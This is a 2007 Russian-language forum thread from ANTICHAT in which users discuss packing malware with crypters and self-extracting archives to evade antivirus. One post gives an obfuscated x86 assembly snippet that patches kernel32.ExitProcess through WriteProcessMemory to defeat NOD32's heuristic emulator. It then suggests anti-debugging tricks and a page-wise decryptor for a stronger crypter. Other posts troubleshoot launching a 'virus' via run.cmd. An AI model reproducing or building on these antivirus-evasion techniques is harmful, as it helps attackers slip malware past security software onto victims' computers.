HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.01.2007, 14:44
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Хорошая статья
вот тока один вопрос, у кого есть иконка фотографий в *.ico ?
 

  #12  
Старый 30.01.2007, 04:02
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Блин у меня проблема, я все делаю по инструкции, запускаю уже гатовый архив мне пишет ошибку что типа фаил не евляется програмой для вин32,
я как понимаю в run.cmd не выплолняется команда start crypter.exe
раньше все норм работало, а теперь блин...
может кто встречался с проблемой?
+ меня раньше в винраре где прописываеш адрес куда будет распоковывотся, можно было галку ставить абсолютный путь, а теперь как пропачтил винрар т.к. срок истек нильзя туда галку ставить
вобще из-за чего может быть проблема?
 

  #13  
Старый 30.01.2007, 09:51
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

я вам сейчас возможно открою секрет, а возможно нет
насколько я знаю у NOD32 самый мощный эвристик/эмулятор кода
я придумал (возможно не я первый) его обходить таким способом:
записать первым байтом ExitProcess retn (0xc3), вызвать ее а потом восстановить старый байт (надо его прочитать)
выдираю код (с анти-интеллектульным мусором) из одной своей фигни (все исправлять уже очень лень)
Код:
	; WriteProcessMemory at kernel32.ExitProcess
	mov eax, 0x1f
	mov ecx, WriteProcessMemory+0x43
	mov edi, ecx
	inc eax
	dec eax
	lea ebx, [bwrite]
	nop
	nop
	jmp nop5
	dd 0x90909090
	dd 0x90909090
	dd 0x90909090
	dd 0x90909090
nop5:
	push ebx
	push 3
	lea ebx, [cmd_retn]
	push ebx
	mov ebx, ExitProcess-2
	inc ebx
	sub ebx, -1
	nop
	nop
	mov ecx, [ebx]
	xchg ebx, ecx
	sub eax, 2
	nop
	nop
	aad
	xor [cmd_retn], 0x55
	jmp nop6
	dd 0x90909090
	dd 0x90909090
	dd 0x90909090
	dd 0x90909090
nop6:
	sub ebx, eax
	push ebx
	add dword [esp], 0x1f
	dec dword [esp]
	mov esi, edi
	dec dword [esp]
	push 1
	dec dword [esp]
	sub dword [esp], 1
	mov ecx, esi
	jmp nop7
	dd 0x90909090
	dd 0x90909090
	dd 0x90909090
	dd 0x90909090
nop7:
	call dword [ecx-0x43]
	nop
	nop
;        jmp ml

	; goodbye, NOD32 heu
	finvoke  ExitProcess, 0
когда я это все делал, работало отлично. NOD видел завершение обычное процесса
и весь код дальше его эмулятор не выполнял. далее можно расшифровывать любым алгоритмом остальной код и запускать его. На SEH нод не реагирует.

Из этого помоему уже можно что-нибудь придумать.

Добавьте некоторые старые антиотладочные приёмы, сделайте навесной расшифровщик постраничный
и у вас получится офигенный криптор.

хэк?

Последний раз редактировалось KEZ; 30.01.2007 в 09:54..
 

  #14  
Старый 02.02.2007, 16:59
Fi$her
Новичок
Регистрация: 27.01.2007
Сообщений: 20
Провел на форуме:
129456

Репутация: 17
Отправить сообщение для Fi$her с помощью ICQ
По умолчанию

не, лучше уж я постаринке, хороший криптор + хороший джойнер))
 

  #15  
Старый 02.02.2007, 18:29
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Тоже пробовал криптовать Sfx архивом, но чёт не помогало, а это прокатило =)
 

  #16  
Старый 03.02.2007, 02:23
теща
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
Провел на форуме:
1052005

Репутация: 131
Отправить сообщение для теща с помощью ICQ Отправить сообщение для теща с помощью MSN Отправить сообщение для теща с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Ksander  
Если выкладывать приватный криптор, то через пару дней о нем можно будет забыть, бо толку 0.
полне согласен , НО товарисч помог тем которые ищут то что не могут сами зделать или написать , то есть комуто + и не тока кому то , а и от кавота если не забудут тож , я думаю не сложно 1 рах написать для кавота то есть для чайника что и как и почему , если он не дурак возможность использует ну а если дурак то увы , етот + в сторону каспера итп......
 

  #17  
Старый 04.02.2007, 02:41
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Объясните пожалуйсто ну уже блин! почему у меня такая проблема?
Проблема описана тут
 

  #18  
Старый 04.02.2007, 18:53
unfuck4bl3
Новичок
Регистрация: 26.01.2007
Сообщений: 13
Провел на форуме:
27367

Репутация: 0
По умолчанию

Цитата:
Сообщение от kez  
Добавьте некоторые старые антиотладочные приёмы, сделайте навесной расшифровщик постраничный
и у вас получится офигенный криптор.
раскажы плз как мона ето все примерн написать
 

  #19  
Старый 04.02.2007, 20:52
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sandjuro  
Объясните пожалуйсто ну уже блин! почему у меня такая проблема?
Проблема описана тут
фиговый архивер, с урезанным функционалом.
 

  #20  
Старый 10.02.2007, 13:15
1337z0r
Новичок
Регистрация: 13.12.2006
Сообщений: 4
Провел на форуме:
8337

Репутация: -1
По умолчанию

Всем привет у меня проблемма. При запуске файла, вирус не успевает вовремя перекодироваться и из-за этого ничего не работает. Теперь вопрос: Как поставить задержку на .cmd? Cпасибо.

 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ca страхует пользователей антивирусов на $1500 от заражения вирусами KPOT_f!nd Мировые новости. Обсуждения. 0 29.09.2006 05:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ